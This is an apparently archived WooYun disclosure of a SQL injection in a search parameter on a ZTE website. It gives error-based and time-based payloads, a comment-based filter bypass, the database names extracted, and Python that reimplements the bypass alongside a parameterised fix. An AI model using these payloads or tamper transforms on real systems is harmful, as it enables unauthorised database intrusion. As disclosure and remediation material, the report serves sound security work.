
Vulnerability summary

Defect ID: wooyun-2015-0114315

Title: SQL injection bypass on a ZTE site

Vendor: ZTE Corporation (中兴通讯股份有限公司)

Author: 路人甲

Submitted: 2015-05-18 06:34

Fixed: 2015-07-02 09:00

Disclosed: 2015-07-02 09:00

Type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-05-18: Details sent to the vendor, awaiting vendor handling
2015-05-18: Vendor confirmed; details disclosed to the vendor only
2015-05-28: Details disclosed to core white hats and domain experts
2015-06-07: Details disclosed to regular white hats
2015-06-17: Details disclosed to intern white hats
2015-07-02: Details disclosed to the public

Brief description:

233

Detailed description:

WooYun: 中兴某分站6处SQL注入打包 (six SQL injections on a ZTE sub-site, bundled)
Honestly, I really don't see why this needed a bypass? A plain UNION gets it straight out. By the way, this one still isn't fixed...
POST /index.php?ac=search&at=result HTTP/1.1
Content-Length: 89
Content-Type: application/x-www-form-urlencoded
Referer: http://www.ztesoft.com:808/
Cookie: e25d4f441419921f549c45d086f5f27a=1431676163
Host: www.ztesoft.com:808
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
keyname=1&keyword=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e8%af%8d&lng=cn&mid=0
Parameter keyname: appending a quote produces an error (the SQL trace below shows the value spliced in as a column identifier, a.1'", not inside a string literal).
mySQL info: Can not connect to MySQL server
Time:Etc/GMT-8 2015-05-15 16-00-04
SQL:SELECT COUNT(*) AS num FROM zte_document as a Left join zte_document_content as b On a.did=b.did WHERE a.lng='cn' AND a.isclass=1 AND a.islink=0 AND a.1\'\" like '%请输入关键词%'
Error???You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\" like '%\xE8\xAF\xB7\xE8\xBE\x93\xE5\x85\xA5\xE5\x85\xB3\xE9\x94\xAE\xE' at line 1
Access Query Errors

Proof of concept:

Running it directly really gets nothing out,
so here is the bypass.
Step 1: replace spaces with --%0A (a MySQL line comment followed by a newline)
---
Parameter: keyname (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: keyname=1 AND (SELECT 3634 FROM(SELECT COUNT(*),CONCAT(0x7162766b71,(SELECT (ELT(3634=3634,1))),0x717a767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&keyword=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e8%af%8d&lng=cn&mid=0
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: keyname=1 AND (SELECT * FROM (SELECT(SLEEP(5)))DEdd)&keyword=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e8%af%8d&lng=cn&mid=0
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
[16:13:11] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[16:13:11] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.10
back-end DBMS: MySQL 5.0
But the databases still could not be dumped.
Step 2:
Fetch the data hex-encoded, and add an inline comment /**/ to get past the filter.
Payload:
keyname=1 AND (SELECT 2505 FROM(SELECT COUNT(*),CONCAT(0x7162766b71,(SELECT MID((HEX(IFNULL(CAST(schema_name AS CHAR),0x20))),1,50) FROM INFORMATION_SCHEMA/**/.SCHEMATA LIMIT 5,1),0x717a767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA/**/.CHARACTER_SETS GROUP BY x)a)
Result:
available databases [7]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] ztesoft_poll
[*] ztesoft_static
[*] ztesoft_website
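Where the injection lands, the two tamper transforms used in the bypass above, how the hex-sliced extraction results are reassembled, and a hardened query builder, as an added Python example that is not part of the original report and not ZTE's code. The table and column names are taken from the SQL trace in the error message; the sqlite3 demo table, its sample rows, the searchable-column allowlist and all helper names are assumptions made for this example.

```python
"""
Added example (not from the original report and not ZTE's code).
Table/column names come from the SQL trace in the error message above;
the sample rows, the column allowlist and all helper names are assumptions.
"""
import re
import sqlite3
from urllib.parse import quote


# --- 1. Where the injection lands -------------------------------------------
# Reconstructed shape of the vulnerable query builder (assumption based on the
# trace): `keyname` is spliced in as a column identifier after "a.", while
# `keyword` goes inside a quoted LIKE pattern. An identifier position needs no
# closing quote, which is why "keyname=1 AND (SELECT ...)" works directly.
def build_vulnerable(keyname, keyword, lng="cn"):
    return (
        "SELECT COUNT(*) AS num FROM zte_document as a "
        "Left join zte_document_content as b On a.did=b.did "
        f"WHERE a.lng='{lng}' AND a.isclass=1 AND a.islink=0 "
        f"AND a.{keyname} like '%{keyword}%'"
    )


# --- 2. The two tamper transforms used in the bypass -------------------------
def space2mysqldash(payload):
    # Step 1 of the bypass (same idea as sqlmap's space2mysqldash tamper):
    # every space becomes "--" plus a newline. The filter sees no space, but
    # MySQL treats "--\n" as an end-of-line comment, i.e. a token separator.
    return payload.replace(" ", "--\n")


def split_schema_ref(payload):
    # Step 2 of the bypass: an inline comment between INFORMATION_SCHEMA and
    # the dot defeats a substring match on "INFORMATION_SCHEMA." while MySQL
    # still resolves the qualified table name.
    return re.sub(r"INFORMATION_SCHEMA\.", "INFORMATION_SCHEMA/**/.", payload, flags=re.I)


def tamper(payload):
    return split_schema_ref(space2mysqldash(payload))


def to_post_body(keyname_payload, keyword="请输入关键词"):
    # What actually goes on the wire: "\n" becomes %0A and the Chinese
    # keyword becomes the UTF-8 %xx sequence seen in the captured request.
    return (f"keyname={quote(keyname_payload, safe='')}"
            f"&keyword={quote(keyword, safe='')}&lng=cn&mid=0")


# --- 3. Reassembling hex-encoded extraction results --------------------------
def hex_chunks(value, width=50):
    # Server side the payload returns MID(HEX(value), start, 50); this
    # emulates those 50-character slices (MySQL's HEX() is upper-case).
    h = value.encode("utf-8").hex().upper()
    return [h[i:i + width] for i in range(0, len(h), width)]


def decode_hex_chunks(chunks):
    # Concatenate the slices before un-hexing: a single 50-char slice has an
    # odd length and cannot be decoded on its own.
    return bytes.fromhex("".join(chunks)).decode("utf-8")


# --- 4. Hardened builder: allowlisted identifier + bound keyword ------------
ALLOWED_COLUMNS = {"title", "content"}  # assumption: the searchable columns


def search_count(conn, keyname, keyword, lng="cn"):
    # Identifiers cannot be bound as parameters, so they must be allowlisted.
    if keyname not in ALLOWED_COLUMNS:
        raise ValueError("unsupported search column")
    # LIKE wildcards inside user input are escaped so "%" or "_" in a search
    # term match literally instead of widening the query.
    pattern = "%" + re.sub(r"([\\%_])", r"\\\1", keyword) + "%"
    sql = (f"SELECT COUNT(*) AS num FROM zte_document AS a "
           f"WHERE a.lng=? AND a.isclass=1 AND a.islink=0 "
           f"AND a.{keyname} LIKE ? ESCAPE '\\'")
    return conn.execute(sql, (lng, pattern)).fetchone()[0]


def demo_db():
    # Constructed sample data (not from the target system).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE zte_document (did INTEGER, lng TEXT, "
                 "isclass INTEGER, islink INTEGER, title TEXT)")
    conn.executemany("INSERT INTO zte_document VALUES (?,?,?,?,?)", [
        (1, "cn", 1, 0, "中兴通讯 年报"),
        (2, "cn", 1, 0, "100% 测试"),
        (3, "en", 1, 0, "ZTE annual report"),
    ])
    return conn


if __name__ == "__main__":
    print(build_vulnerable("1'\"", "x"))  # the quote lands right after a.1
    print(to_post_body(tamper("1 AND (SELECT 1 FROM INFORMATION_SCHEMA.SCHEMATA)")))
    print(decode_hex_chunks(hex_chunks("ztesoft_static")))
    conn = demo_db()
    print(search_count(conn, "title", "年报"), search_count(conn, "title", "%"))
```

The hardened builder keeps the column name out of the parameter list because placeholders only bind values, never identifiers; the allowlist is the only thing standing between `keyname` and the query text, so it must be a fixed set, not a pattern check.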

Fix:

~~

Copyright notice: please credit 路人甲@乌云 when reposting.


Responses

Vendor response:

Severity: Low

Rank: 5

Confirmed: 2015-05-18 08:59

Vendor reply:

Thanks~

Latest status:

None yet